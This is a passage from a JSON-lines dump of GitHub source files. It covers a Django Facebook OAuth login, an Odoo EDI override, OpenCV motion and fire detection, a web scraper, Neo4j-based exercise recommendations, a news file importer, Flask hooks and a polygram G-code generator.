)\n","repo_name":"OCA/delivery-carrier","sub_path":"delivery_cttexpress/wizards/cttexpress_manifest_wizard.py","file_name":"cttexpress_manifest_wizard.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"32"} +{"seq_id":"3359506630","text":"import base64\r\nimport cgi\r\nimport hashlib\r\nimport hmac\r\nimport time\r\nimport logging\r\nimport urllib\r\n\r\nfrom django.contrib.auth.models import User\r\nfrom django.utils import simplejson\r\nfrom django.conf import settings\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\nfrom django.contrib.auth import login as django_login, \\\r\n authenticate as django_authenticate, logout as django_logout\r\n\r\nfrom google.appengine.api import users\r\n\r\ndef parse_cookie(value):\r\n \"\"\"Parses and verifies a cookie value from set_cookie\"\"\"\r\n if not value: return None\r\n parts = value.split(\"|\")\r\n if len(parts) != 3: return None\r\n if cookie_signature(parts[0], parts[1]) != parts[2]:\r\n logging.warning(\"Invalid cookie signature %r\", value)\r\n return None\r\n timestamp = int(parts[1])\r\n if timestamp < time.time() - 30 * 86400:\r\n logging.warning(\"Expired cookie %r\", value)\r\n return None\r\n try:\r\n return base64.b64decode(parts[0]).strip()\r\n except:\r\n return None\r\n\r\n\r\ndef cookie_signature(*parts):\r\n \"\"\"Generates a cookie signature.\r\n\r\n We use the Facebook app secret since it is different for every app (so\r\n people using this example don't accidentally all use the same secret).\r\n \"\"\"\r\n hash = hmac.new(settings.FACEBOOK_APP_SECRET, digestmod=hashlib.sha1)\r\n for part in parts: hash.update(part)\r\n return hash.hexdigest()\r\n\r\ndef set_cookie(response, name, value, domain=None, path=\"/\", max_age=None):\r\n \"\"\"Generates and signs a cookie for the give name/value\"\"\"\r\n timestamp = str(int(time.time()))\r\n value = base64.b64encode(value)\r\n signature = cookie_signature(value, timestamp)\r\n response.set_cookie(name,\r\n \"|\".join([value, timestamp, signature]),\r\n max_age=max_age,\r\n path='/',\r\n domain=domain)\r\n\r\n# redirects to the google user api generated login url\r\ndef login(request):\r\n verification_code = request.GET.get(\"code\")\r\n if verification_code:\r\n return authenticate(request)\r\n args = dict(client_id=settings.FACEBOOK_APP_ID, redirect_uri=request.build_absolute_uri())\r\n scope = \"publish_stream,friends_relationships,offline_access, friends_of_friends\"\r\n return HttpResponseRedirect('https://graph.facebook.com/oauth/authorize?scope=%s&%s' %\r\n (scope, urllib.urlencode(args)))\r\n\r\n\r\n# redirects to the google user api generated login url\r\ndef logout(request):\r\n django_logout(request)\r\n return HttpResponseRedirect(users.create_logout_url(\"/\"))\r\n\r\n\r\n\r\ndef authenticate(request):\r\n user = django_authenticate(request=request)\r\n if user is not None:\r\n django_login(request, user)\r\n #redirect to valid login page\r\n response = HttpResponseRedirect(request.GET.get('next', '/'))\r\n set_cookie(response, \"fb_user\", user.id,\r\n max_age=30 * 86400)\r\n return response\r\n else:\r\n # return invalid login page\r\n return HttpResponse('Invalid', 'text/plain')","repo_name":"burgalon/django-facebook-oauth-backend","sub_path":"facebook/auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"31327178562","text":"# 
-*- coding: utf-8 -*-\r\n\r\nfrom odoo import models, _\r\n\r\n\r\nclass AccountEdiFormat(models.Model):\r\n    _inherit = 'account.edi.format'\r\n\r\n\r\n    # Override original method\r\n    def _create_invoice_cfdi_attachment(self, invoice, data):\r\n        cfdit = {\r\n            'in_invoice': 'Bill',\r\n            'in_refund': 'Bill-Refund',\r\n            'out_invoice': 'Invoice',\r\n            'out_refund': 'Invoice-Refund'\r\n        }\r\n        cfdi_filename = (\"%s-%s-MX-%s.xml\" % (\r\n            invoice.journal_id.code, invoice.payment_reference,\r\n            cfdit.get(invoice.move_type))).replace('/', '')\r\n        description = (_('Mexican %s CFDI generated for the %s document.') % (cfdit.get(invoice.move_type), invoice.name))\r\n\r\n        return self._create_cfdi_attachment(cfdi_filename, description, invoice, data)","repo_name":"liaohanzhen/custom_14","sub_path":"l10n_mx_edi_vendor_bills/models/account_edi_format.py","file_name":"account_edi_format.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70378940251","text":"import cv2\nimport numpy as np\n\nvideo = cv2.VideoCapture(0)\n \nwhile True:\n    (ret, frame) = video.read()\n\n    blur = cv2.GaussianBlur(frame, (21, 21), 0)\n    hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n \n    lower = [18, 50, 50]\n    upper = [35, 255, 255]\n    lower = np.array(lower, dtype=\"uint8\")\n    upper = np.array(upper, dtype=\"uint8\")\n    mask = cv2.inRange(hsv, lower, upper)\n \n    output = cv2.bitwise_and(frame, hsv, mask=mask)\n    no_red = cv2.countNonZero(mask)\n \n    cv2.imshow(\"output\", output)\n \n    if int(no_red) > 20000:\n        print ('Fire detected')\n \n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n \ncv2.destroyAllWindows()\nvideo.release()\n","repo_name":"christian0101/Firewatch","sub_path":"fireDetectionColourBased.py","file_name":"fireDetectionColourBased.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"24578880478","text":"import cv2\n\ncap = cv2.VideoCapture('film.mp4')\nfgbg=cv2.createBackgroundSubtractorMOG2(detectShadows=False)\n\nwhile(1):\n    ret,frame=cap.read()\n    fgmask = fgbg.apply(frame)\n    median = cv2.medianBlur(fgmask,3)\n\n    (contours,hierarchy)=cv2.findContours(median.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n    for c in contours:\n        if cv2.contourArea(c) < 500:\n            continue\n        (x,y,w,h)=cv2.boundingRect(c)\n        cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),3)\n\n    background = cv2.resize(median,(600,360))\n    frame1 = cv2.resize(frame,(600,360))\n\n    cv2.imshow('background',background)\n    cv2.imshow('frame',frame1)\n\n    k = cv2.waitKey(1) & 0xff\n    if k==27:\n        break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"hasanilteris/Simple-Tracking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41593224542","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: 可以叫我才哥\n\"\"\"\n\nimport requests\nimport re\nimport pandas as pd\nimport html\nfrom lxml import etree\nimport time\n\n\ndef get_html(url):\n    time.sleep(1)\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36\",\n    }\n\n    r = requests.get(url, headers=headers)\n\n    # The fetched page contains HTML special characters; unescape them as follows\n    r = html.unescape(r.text)\n    r = re.sub(':\\xa0', '', r)\n\n    return r\n\n\nurl = 'https://www.douban.com/doulist/110567393/'\nr = get_html(url)\n# 
Get all the URLs\nr_text = re.sub(r'\\s','',r)\nurls = re.findall(r'(:Exercise{{id: {exercise.id}}})\n                WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n                SET rel.times = rel.times + 1\n            \"\"\")\n            session.run(f\"\"\"\n                MATCH (e:Exercise)<-[rel:{Exercise.EXERCISE_RELATIONSHIP}]-(:Exercise{{id: {exercise.id}}})\n                WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n                SET rel.times = rel.times + 1\n            \"\"\")\n            session.run(f\"\"\"\n                MATCH (e1:Exercise)\n                MATCH (e2:Exercise{{id: {exercise.id}}})\n                WHERE e1.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}] AND NOT (e1)-[:{Exercise.EXERCISE_RELATIONSHIP}]-(e2)\n                CREATE (e1)-[rel:{Exercise.EXERCISE_RELATIONSHIP}{{times:1}}]->(e2)\n                CREATE (e1)<-[rel2:{Exercise.EXERCISE_RELATIONSHIP}{{times:1}}]-(e2)\n            \"\"\")\n            session.run(f\"\"\"\n                MATCH (:User)-[rel:{Exercise.USER_RELATIONSHIP}]->(:Exercise{{id: {exercise.id}}})\n                SET rel.times = rel.times + 1\n            \"\"\")\n            session.run(f\"\"\"\n                MATCH (u:User)\n                MATCH (e:Exercise{{id: {exercise.id}}})\n                WHERE NOT (u)-[:{Exercise.USER_RELATIONSHIP}]-(e)\n                CREATE (u)-[rel:{Exercise.USER_RELATIONSHIP}{{times:1}}]->(e)\n            \"\"\")\n        workout.exercises.add(exercise)\n        workout.save()\n\n        return Response(\n            self.serializer_class(workout, context={'request': request}).data,\n            status=status.HTTP_200_OK\n        )\n\nclass ExerciseRecommendationView(APIView):\n    \"\"\" View to get exercise recommendations based on an ongoing workout \"\"\"\n\n    permission_classes = [IsAuthenticated]\n    serializer_class = ExerciseSerializer\n\n    TIMES_WEIGHT = 0.7\n    RATING_WEIGHT = 0.3\n\n    def get(self, request, workout_id):\n        \"\"\" Gets recommendations for exercises in a workout \"\"\"\n        workout = Workout.objects.get(id=workout_id)\n        if workout.user != request.user:\n            return Response(\n                {\"message\": \"You do not have access to the Workout\"},\n                status=status.HTTP_401_UNAUTHORIZED\n            )\n        with neo4j.session() as session:\n            result = session.run(f\"\"\"\n            MATCH (e:Exercise)-[rel]->(e2:Exercise)\n            WHERE e.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}] AND NOT e2.id IN [{','.join(map(lambda i: str(i), workout.exercises.all().values_list('id', flat=True)))}]\n            WITH e2, rel, sum(rel.times) as total_relationships \n            ORDER BY (0.7 * rel.times/total_relationships) + (0.3 * e2.rating/5) DESC\n            RETURN collect(DISTINCT e2.id)\"\"\")\n            exercises = [Exercise.objects.get(id=i) for i in result.value()[0]]\n        return Response(\n            self.serializer_class(exercises, context={'request': request}, many=True).data,\n            status=status.HTTP_200_OK\n        )\n","repo_name":"joshtummala/workout_recommendations","sub_path":"recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24494653803","text":"import datetime\nimport sys\nimport os\nimport json\nimport re\nimport xml.etree.ElementTree as Et\n\ndate = datetime.datetime\n\n\nclass Choose:\n    def __init__(self):\n        self.input_type = input(\"\"\"Choose input type:\n            1 - Input\n            2 - Load from file\n            3 - Exit\n            \"\"\")\n        if self.input_type == '1':\n            self.type_of_publication = input(f\"\"\"Choose type of news or exit, please (Enter digit):\n                1 - News\n                2 - Private Ad\n                3 - Hello_message\n                4 - Exit\n                \"\"\")\n        elif self.input_type == '2':\n            self.folder_choose = input(f\"\"\"Folder for file:\n                1 - Default Folder\n                2 - 
User folder\n \"\"\")\n self.file_type = input(\"\"\"Choose type of file:\n 1 - TXT\n 2 - JSON\n 3 - XML\n \"\"\")\n self.count_of_publications = int(input('Input count of publ from file '))\n if self.folder_choose == '1':\n self.file_path = sys.path[1]\n elif self.folder_choose == '2':\n self.file_path = input(r\"Enter path to file (in format C:\\) \")\n self.source_file_name = input('Enter your file name\\n')\n self.source_file_path = os.path.join(self.file_path, self.source_file_name)\n elif self.input_type == '3':\n sys.exit()\n\n self.content = ''\n\n def read_from_txt_file(self):\n self.source_file = open(self.source_file_path, 'r').read()\n self.text_from_file = re.split(\"\\\\n\\\\n\", self.source_file)\n return self.text_from_file\n\n def write_from_txt_file(self, target_of_writing=\"News.txt\"):\n with open(target_of_writing, \"a\") as file:\n if self.count_of_publications > 0:\n for word in self.text_from_file:\n if self.text_from_file.index(word) < self.count_of_publications:\n file.write(word + '\\n\\n')\n os.remove(self.source_file_path)\n\n\n def read_from_xml_file(self):\n xml_file = Et.parse(self.source_file_path)\n self.root = xml_file.getroot()\n return self.root\n\n def write_from_xml(self, target_of_writing=\"News.txt\"):\n for index, elem in enumerate(self.root.findall('publication')):\n if index >= self.count_of_publications:\n break\n else:\n for publication in elem:\n if publication.text.lower() == 'news':\n self.content = f\"News------------------\\n{publication.attrib['text'].capitalize()}\\n\" \\\n f\"{publication.attrib['city'].capitalize()}, \" \\\n f\"{date.now().strftime('%d/%m/%Y %I.%M')}\\n\\n\"\n\n elif publication.text.lower() == 'ad':\n actual_date = date.strptime(publication.attrib['actual_date'], '%d/%m/%Y')\n ads_actual_date = actual_date.strftime('%d/%m/%Y')\n days_until = (actual_date.date() - date.now().date()).days\n self.content = f\"Private Ad------------\\n{publication.attrib['text'].capitalize()}\\n\" \\\n f\"Actual until: {ads_actual_date}, {days_until} days left\\n\\n\"\n\n elif publication.text.lower() == 'hello':\n self.content = f\"Hello message---------\\nFrom {publication.attrib['user_name'].capitalize()}\" \\\n f\" TO {publication.attrib['receiver_name'].capitalize()}\\n\" \\\n f\"{publication.attrib['text'].capitalize()}\\n\\n\"\n with open(target_of_writing, \"a\") as file:\n file.write(self.content)\n os.remove(self.source_file_path)\n\n def read_from_json_file(self):\n self.list_of_dict_from_json = json.load(open(self.source_file_path))\n return self.list_of_dict_from_json\n\n def write_from_json_file(self, target_of_writing=\"News.txt\"):\n for index, dictionary in enumerate(self.list_of_dict_from_json):\n if index < self.count_of_publications:\n for key, value in dictionary.items():\n if key == 'type' and value.lower() == 'news':\n self.content = f\"News------------------\\n{dictionary['text'].capitalize()}\\n\" \\\n f\"{dictionary['city'].capitalize()}, {date.now().strftime('%d/%m/%Y %I.%M')}\\n\\n\"\n elif key == 'type' and value.lower() == 'ad':\n actual_date = date.strptime(dictionary['actual_date'], '%d/%m/%Y')\n ads_actual_date = actual_date.strftime('%d/%m/%Y')\n days_until = (actual_date.date() - date.now().date()).days\n self.content = f\"Private Ad------------\\n{dictionary['text'].capitalize()}\\nActual until:\" \\\n f\"{ads_actual_date}, {days_until} days left\\n\\n\"\n elif key == 'type' and value.lower() == 'hello':\n self.content = f\"Hello message---------\\nFrom {dictionary['user_name'].capitalize()} TO \" \\\n 
f\"{dictionary['receiver_name'].capitalize()}\\n\" \\\n                                       f\"{dictionary['text'].capitalize()}\\n\\n\"\n                    with open(target_of_writing, \"a\") as file:\n                        file.write(self.content)\n                break\n            else:\n                break\n        os.remove(self.source_file_path)\n","repo_name":"ArtsemNikulin/DQE_PY","sub_path":"choose.py","file_name":"choose.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70981860571","text":"from .views import bp\nimport config\nfrom flask import session,g\nfrom .models import CMSUser,CMSPermission\n\n@bp.before_request\ndef before_request():\n    if config.CMS_USER_ID in session:\n        user_id = session.get(config.CMS_USER_ID)\n        user = CMSUser.query.get(user_id)\n        if user:\n            g.cms_user = user\n\n@bp.context_processor\ndef cms_context_pocessor():\n    return {'CMSPermission':CMSPermission}","repo_name":"derek-zhang123/BBS","sub_path":"apps/cms/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"32"} +{"seq_id":"45106412962","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom GCodeGenerator import GCodeGenerator\nfrom GCodeGenerator import dTheta\nfrom GCodeGenerator import dLength\n\n\n# Solve slope (m) and intercept(d) given two points (x1, y1) , (x2, y2)\n# y = mx + d\n#  |y1|   = | x1  1 | | m |\n#  |y2|     | x2  1 | | d |\n# a = np.array([x1, 1] , [x2,1]) b = [y1, y2] , c = [m,d]\ndef SolveLine( x1, y1, x2, y2 ) :\n    a = np.array( [[ x1, 1.] , [ x2, 1.]] )\n    b = np.array( [y1, y2 ] )\n    c = np.linalg.solve(a,b)\n\n    return c\n\n\n\nclass Polygrams:\n\n    # number of legs/sides\n    n = 5\n    # inner radius of the polygon\n    r = 10\n    # inner angle\n    delta = -1.*math.pi / 2\n    theta = 2.*math.pi / n\n\n    # points on the circle\n    x = []\n    y = []\n    # slope and intercept for the side lines : y = mx+ d\n    m = []\n    d = []\n    # position of resolved tip\n    xt = []\n    yt = []\n    # Routing path\n    u=[]\n    v=[]\n\n    # Tip space (ts) and Bead height (bh) and first layer adjustment (fh)\n    bh = 0.5\n    ts = 0.35\n    fh = 0.1\n\n    # Linear density ( or Flow rate )\n    rho = 0.75\n    Fval = 6000.\n    Eval = Fval*rho\n\n    # objType = 0 ; polygon , objType = 1 : polygram\n    def __init__(self, n_ = 5 , r_ = 10, objType = 0 ):\n        self.n = int(n_)\n        self.r = float(r_)\n        self.objType = objType\n        self.delta = -1.*math.pi / 2\n        self.theta = 2.*math.pi / self.n\n        self.Eval = self.rho * self.Fval\n        self.gFval1 = self.Fval\n        self.gFval2 = self.Fval\n        self.x0 = 0\n        self.y0 = 0\n        # retraction distance and retraction Eval\n        self.rth = 2\n        self.rEval = -1\n\n    def setCenter(self, x0, y0):\n\n        self.x0 = x0\n        self.y0 = y0\n\n    def setGeometry(self, r1, r2, n , delta_ , objectType ):\n\n        self.n = int( n )\n        self.r1 = r1\n        self.r2 = r2\n        self.objType = objectType\n        self.delta = delta_\n        self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n\n    def setPrintable(self, Fval_, rho_, bh_, ts_, fh_, bw_, nlayer_ ):\n\n        self.Fval = Fval_\n        self.rho = rho_\n        self.Eval = self.rho * self.Fval\n        self.bh = bh_\n        self.ts = ts_\n        self.fh = fh_\n        self.bw = bw_\n        self.nLayer = int( nlayer_ )\n        #self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n\n    def setRetraction(self, rth, rEval ):\n\n        self.rth = rth\n        self.rEval = rEval\n\n    def SetParameters(self, n_ , r_ , delta_ = -1.*math.pi /2 ):\n        self.n = int(n_)\n        self.r = float(r_)\n        self.delta = delta_\n        self.theta = 2.*math.pi / self.n\n        self.x = []\n        self.y = []\n        self.m = []\n        self.d = []\n        self.xt = []\n        
self.yt = []\n self.u = []\n self.v = []\n\n # points on the circle\n def GetPolygon(self):\n # Compute n points of polygon\n for i in range( self.n ):\n self.x.append( self.r*math.cos(self.theta*i + self.delta) + self.x0 )\n self.y.append( self.r*math.sin(self.theta*i + self.delta) + self.y0 )\n #print( ' (%d) Angle = %.3f , x =%.3f y =%.3f ' %( i, math.degrees(self.theta*i), self.x[i], self.y[i] ) )\n\n if self.objType == 0 :\n self.x.append( self.x[0] )\n self.y.append( self.y[0] )\n\n def GetPolygonA(self, nside, iniA, endA, xc, yc, R ):\n\n dPhi = 0\n arcV = []\n if endA > iniA :\n dPhi = (endA - iniA) / nside\n else :\n dPhi = (2*math.pi - (iniA - endA )) / nside\n\n for i in range( nside ) :\n Phi = iniA + (i*dPhi)\n x = R*math.cos( Phi ) + xc\n y = R*math.sin( Phi ) + yc\n arcV.append( [x,y] )\n\n return arcV\n\n def GetPolygonB(self, nside, iniPos, endPos, xc, yc ):\n\n # Getting initial radius ri and ending radius rj\n # Initial/ending angle in the range of 0 ~ 2pi\n ri = math.sqrt( ((xc - iniPos[0] )*(xc-iniPos[0])) + ((yc - iniPos[1] )*(yc-iniPos[1])) )\n rj = math.sqrt( ((xc - endPos[0] )*(xc-endPos[0])) + ((yc - endPos[1] )*(yc-endPos[1])) )\n iniA = math.acos( (iniPos[0]-xc )/ri )\n endA = math.acos( (endPos[0]-xc )/rj )\n if iniPos[1] < yc :\n iniA = (math.pi*2) - iniA\n if endPos[1] < yc :\n endA = (math.pi*2) - endA\n\n\n R = ri\n #dR = (rj - ri) / nside\n dR = 0\n dPhi = 0\n arcV = []\n if endA > iniA :\n dPhi = (endA - iniA) / nside\n else :\n dPhi = (2*math.pi - (iniA - endA )) / nside\n\n for i in range( nside ) :\n Phi = iniA + (i*dPhi)\n x = R*math.cos( Phi ) + xc\n y = R*math.sin( Phi ) + yc\n arcV.append( [x,y] )\n R = R + dR\n\n return arcV\n\n\n # Solve n side of the polygon : y = mx + d\n # solve m and d given (x1, y1) , (x2, y2)\n # |y1| = | x1 1 | | m |\n # |y2| | x2 1 | | d |\n # a = np.array([x1, 1] , [x2,1]) b = [y1, y2] , c = [m,d]\n def GetLine(self):\n\n for i in range( self.n ):\n j = i+1\n if i == self.n-1 :\n j = 0\n\n a = np.array( [[self.x[i], 1.] , [self.x[j],1.]] )\n b = np.array( [ self.y[i], self.y[j] ] )\n c = np.linalg.solve(a,b)\n #print(' [%.3f , %.3f] = [ %.3f , %.3f ] [ %.3f, %.3f ] ' %( self.y[i], self.y[j], self.x[i], self.x[j], c[0], c[1] ) )\n self.m.append( c[0] )\n self.d.append( c[1] )\n\n\n # Solve n tips of the polygram from the polygon\n def GetPolygram(self):\n\n for i in range(self.n):\n j = i+2\n if j > self.n-1:\n j = j - self.n\n\n a = np.array( [[self.m[i], -1.] 
, [self.m[j],-1.]] )\n b = np.array( [ -1*self.d[i], -1*self.d[j] ] )\n c = np.linalg.solve(a,b)\n self.xt.append( c[0] )\n self.yt.append( c[1] )\n #print( '(%d,%d) = [ %.3f, %.3f ]' %( i, j, c[0], c[1]) )\n self.u.append( c[0] + self.x0)\n self.v.append( c[1] + self.y0)\n self.u.append( self.x[j] + self.x0)\n self.v.append( self.y[j] + self.y0)\n\n # Return to starting point\n self.u.append(self.xt[0])\n self.v.append(self.yt[0])\n\n def Create(self, n_, r_, delta_ = -1.*math.pi /2 ):\n print( ' Create %d-side Polygram with radius %.2f' %( n_ , r_) )\n self.SetParameters( n_, r_, delta_ )\n self.GetPolygon()\n if self.objType == 1 :\n self.GetLine()\n self.GetPolygram()\n\n def SetGlideSpeed(self, fVal_1, fVal_2 ):\n self.gFval1 = fVal_1\n self.gFval2 = fVal_2\n\n\n # status is given by the way(G0 or G1 or retract) to the point\n # rS status -> 1 : print , 0: move only , 2: retract,\n # This function is only used after Create\n def GetPolygramResult(self, rS = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n eVal = 0\n for i in range( len(self.u) ):\n\n if i == 0:\n eVal = -1.\n\n # Adding retraction\n if len(rx) > 0 and retract :\n rx.append( rx[ len(rx) -1 ] )\n ry.append( ry[ len(ry) -1 ] )\n rz.append( zVal + 2 )\n rE.append( eVal )\n rS.append( 2 )\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal + self.rth )\n rE.append( self.rEval )\n rS.append( 0 )\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( -2 )\n else :\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( 0 )\n\n else :\n dx = self.u[i] - self.u[i-1]\n dy = self.v[i] - self.v[i-1]\n dl = math.sqrt( (dx*dx) + (dy*dy) )\n dt = dl / self.Fval\n eVal = self.Eval * dt\n\n rx.append(self.u[i])\n ry.append(self.v[i])\n rz.append( zVal )\n rE.append( eVal )\n rS.append( 1 )\n\n def GetPolygonResult(self, rS = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n eVal = 0\n for i in range( len(self.x) ):\n\n if i == 0:\n eVal = -1.\n\n if len(rx) > 0 and retract :\n rx.append( rx[ len(rx) -1 ] )\n ry.append( ry[ len(ry) -1 ] )\n rz.append( zVal + 2 )\n rE.append( eVal )\n rS.append( 2 )\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal + self.rth )\n rE.append( self.rEval )\n rS.append( 0 )\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( -2 )\n else :\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( 0.0 )\n rS.append( 0 )\n\n else :\n\n dx = self.x[i] - self.x[i-1]\n dy = self.y[i] - self.y[i-1]\n dl = math.sqrt( (dx*dx) + (dy*dy) )\n dt = dl / self.Fval\n eVal = self.Eval * dt\n\n rx.append(self.x[i])\n ry.append(self.y[i])\n rz.append( zVal )\n rE.append( eVal )\n rS.append( 1 )\n\n def GetResult(self, rs = [], rx = [], ry = [], rz = [], zVal = 0., rE = [], retract = False ):\n\n if self.objType == 0 :\n print('Get Result Type 0')\n self.GetPolygonResult( rs, rx, ry, rz, zVal, rE, retract )\n elif self.objType == 1 :\n print('Get Result Type 1')\n self.GetPolygramResult( rs, rx, ry, rz, zVal, rE, retract )\n else :\n print('Get Result Type 2')\n self.GetPolygramResult( rs, rx, ry, rz, zVal, rE, retract )\n\n\n def Configure(self):\n\n self.objType = input('Polygon (0) or Polygram(1) : ')\n if self.objType == '': self.objType = 1\n else : self.objType = int(self.objType)\n\n self.n = input('Number of Sides (5): ')\n if self.n == '': self.n = 5\n else : self.n = int(self.n)\n self.r1 = 
input('1st Radius (18): ')\n if self.r1 == '': self.r1 = 18\n else : self.r1 = float( self.r1)\n self.r2 = input('2nd Radius (10): ')\n if self.r2 == '': self.r2 = 10\n else : self.r2 = float( self.r2)\n self.bw = input('Bead width (0.75): ')\n if self.bw == '': self.bw = 0.75\n else : self.bw = float(self.bw)\n self.nLayer = input('Number of Layer (1): ')\n if self.nLayer == '': self.nLayer = 1\n else : self.nLayer = int( self.nLayer )\n self.delta = input(' Delta angle :')\n if self.delta == '' : self.delta = -1*math.pi/2\n else : self.delta = float( self.delta )\n self.rho = input(' Flow Rate (0.75) :')\n if self.rho == '' : self.rho = 0.75\n else : self.rho = float( self.rho )\n self.Fval = input(' Stage Velocity (6000) :')\n if self.Fval == '' : self.Fval = 6000\n else : self.Fval = float( self.Fval )\n\n self.Eval = self.rho * self.Fval\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n print(\" FlowRate %.3f Speed %.3f Extrude %.3f \" %(self.rho, self.Fval, self.Eval ))\n\n def Construct2D(self, zVal, rS=[], rx =[], ry= [], rz =[], rE = [], retract = True ):\n\n # Rotation angle\n dtheta = 2*math.pi/ self.n\n\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n # Inside-out or outside-in\n dr = self.bw\n r = self.r1 + (self.bw/2)\n if (self.r1 - self.r2) > 0 :\n r = self.r1 - (self.bw/2)\n dr = -1*self.bw\n\n da_ = self.delta\n for i in range( self.nStep ):\n #print( ' == r = %.3f == \\n' %(r))\n self.Create( self.n, r , da_ )\n #self.GetResult(rs, rx, ry)\n self.GetResult(rS, rx, ry, rz, zVal, rE, retract )\n r = r+ dr\n da_ = da_ + dtheta\n\n def Construct3D(self, rS=[], rx =[], ry= [], rz =[], rE = [] ):\n\n self.nStep = int( abs(self.r1 - self.r2)/self.bw )\n # Rotation angle\n dtheta = 2*math.pi/ self.n\n\n # Inside-out or outside-in\n dr = self.bw\n r = self.r1 + (self.bw/2)\n if (self.r1 - self.r2) > 0 :\n r = self.r1 - (self.bw/2)\n dr = -1*self.bw\n r0 = r\n #stagger = 0.5*self.bw\n stagger = 0\n\n # Z level\n zVal = self.bh + self.ts + self.fh\n\n # Starting angle\n da_ = self.delta\n for i in range( self.nLayer ):\n print(' Print Level %d' %(i))\n if dr > 0 and i%2 == 1 :\n r = r0 + stagger\n elif dr < 0 and i%2 == 1 :\n r = r0 - stagger\n else :\n r = r0\n\n for j in range( self.nStep ):\n print( ' == r = %.3f == \\n' %(r))\n if j == 0 :\n retract = True\n else :\n retract = False\n self.Create( self.n, r , da_ )\n self.GetResult(rS, rx, ry, rz, zVal, rE, retract )\n r = r+ dr\n\n\n da_ = da_ + dtheta\n zVal = zVal + self.bh\n\n def AddSkirt(self,rs = [], rx = [] , ry = [] , rz = [], rE = [] ) :\n\n rSkirt = max([self.r1, self.r2]) + 10\n print( ' == Printing Skirt %.3f==' %(rSkirt))\n\n # Starting angle\n da_ = self.delta\n # initial Z position\n zVal = self.bh + self.ts + self.fh\n\n self.Create( self.n, rSkirt, da_ )\n self.GetResult(rs, rx, ry, rz, zVal, rE )\n\n'''\n\npolyObj = Polygrams()\npolyObj.Configure()\nrs = []\nrx = []\nry = []\nrz = []\nrE = []\n\n\n#polyObj.Construct2D(rs, rx, ry)\npolyObj.AddSkirt(rs, rx, ry, rz, rE )\npolyObj.Construct3D(rs, rx, ry, rz, rE )\n#polyObj.SetGlideSpeed(1000,1000)\n#polyObj.Gliding( 0.06, 0.1 , 0.06, 0.1, rs, rx, ry, rz, rE)\n\n# Output GCode\ngc = GCodeGenerator( rs, rx, ry, rz, rE, polyObj.Fval )\n#gc.SetGlideSpeed( polyObj.gFval1, polyObj.gFval2 )\ngc.SetGlideSpeed( 2000, 3000 )\ngc.Gliding( 0.06, 0.1 , 0.06, 0.1, rs, rx, ry, rz, rE )\n\ngc.Shift( 150, 150, 0 )\ngc.Generate()\n\n# setup cavas\nfig = plt.figure( figsize=(7.5,7.5) )\nfig.suptitle( 'Polygram', fontsize=10, fontweight='bold')\n\n# one sub plot 
